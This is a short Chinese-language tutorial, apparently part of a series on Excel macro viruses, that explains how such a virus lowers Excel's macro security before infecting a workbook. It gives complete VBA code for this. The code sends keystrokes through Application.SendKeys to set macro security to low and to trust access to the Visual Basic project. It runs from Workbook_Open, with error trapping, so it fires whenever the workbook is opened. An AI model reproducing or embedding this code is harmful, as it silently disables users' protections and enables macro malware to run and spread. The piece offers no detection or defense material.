小述Excel宏病毒的工作原理_第二讲,修改安全性的感染原理

小述Excel宏病毒的工作原理_第二讲,修改安全性的感染原理

一个宏的运行,特别是有恶意的宏程序的运行,
受宏的安全性的影响是最大的,
如果宏的安全性为高,那么,没有签署的宏就不能运行了,
甚至,还能使部分Excel的功能失效.
所以,宏病毒在感染Excel之前,
会自行对Excel的宏的安全性进行修改,
把宏的安全性设为低.
Application.SendKeys "%TMSs%L{RETURN}"

仅修改这个还不行,
很多宏会涉及到Visual Basic,
所以,宏的安全性还要信任对于"Visual Basic 项目"的访问,
所以,综合安全级别的修改,就为
Application.SendKeys "%TMSs%LT%v{RETURN}"

如何判断信任还是不信任对于"Visual Basic 项目"的访问,
可以用出错捕获进行修改:
On Error GoTo End_Sub
    '其它功能的程序段
    Exit Sub
End_Sub:
Application.SendKeys "%TMSs%LT%v{RETURN}"

本段程序的功能为:
一旦宏无法正常就进行宏的安全性的修改
和对信任对于"Visual Basic 项目"的访问的修改,
从而这宏病毒的正常运行提供系统支持.
本程序应放在VBA中的ThisWorkbook
Private Sub Workbook_Open()
End Sub
这样一旦打开工作薄就会对其进行有效的修改.

完整的程序为:
Private Sub Workbook_Open()
    On Error GoTo End_Sub
        '其它功能的程序段
        Exit Sub
End_Sub:
    Application.SendKeys "%TMSs%LT%v{RETURN}"
End Sub